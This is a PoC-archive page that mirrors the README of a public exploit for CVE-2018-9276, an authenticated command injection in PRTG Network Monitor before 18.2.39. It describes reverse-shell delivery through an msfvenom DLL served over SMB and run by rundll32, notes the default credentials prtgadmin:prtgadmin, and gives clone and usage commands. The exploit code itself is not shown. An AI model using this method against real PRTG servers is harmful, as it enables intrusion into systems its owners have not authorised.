Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2018-9276 PoC — Paessler PRTG Network Monitor 操作系统命令注入漏洞

Source
https://github.com/wildkindcc/CVE-2018-9276
Associated Vulnerability
Title:Paessler PRTG Network Monitor 操作系统命令注入漏洞 (CVE-2018-9276)
Description:An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.
Description
CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
Readme
# CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
https://nvd.nist.gov/vuln/detail/CVE-2018-9276

Improved version of an exploit written by https://github.com/M4LV0.  I used the POST data from their script but just made it more reliable as I didnt have much success with it.

Payload delivery is essentially smb_delivery.  Impacket serves up a .dll generated by msfvenom, rundll32.exe does all the work.

Tested on Windows Server 2016 against PRTG 18.1.37.

## Dependancies

By no means is this well written and it's cobbled together from stackoverflow.  This was developed for use with Kali Linux and assumes the following is available:
* Impacket
* Netcat
* Msfvenom

## Assumptions
This is a point and shoot exploit, all you need to know are the admin credentials for the PRTG instance (default prtgadmin:prtgadmin).  Depending on the configuration of the target machiene, your milage may vary.  The following assumptions have been made:
* Target machine is Windows;
* Defender / Applocker is not running; and
* Outbound SMB access is permitted

## Installation


```bash
git clone https://github.com/wildkindcc/CVE-2018-9276.git
python CVE-2018-9276.py -h
```

## Usage
Figure out the credentials and drop shells :)
```python
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]

optional arguments:
  -h, --help            show this help message and exit
  -i HOST, --host HOST  IP address / Hostname of vulnerable PRTG server
  -p PORT, --port PORT  Port number
  --lhost LHOST         LHOST for MSFVENOM
  --lport LPORT         LPORT for MSFVENOM
  --user USER           Administrator Username
  --password PASSWORD   Administrator Password
  --https               Negotiate SSL connection to the server (Requires
                        socket to be compiled with SSL support)

```
## Disclaimer

This won't let you hack the Gibson.  Do not use this against ANY systems for which you are unauthorised.  I wrote this for fun.  Educational purposes only etc etc.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →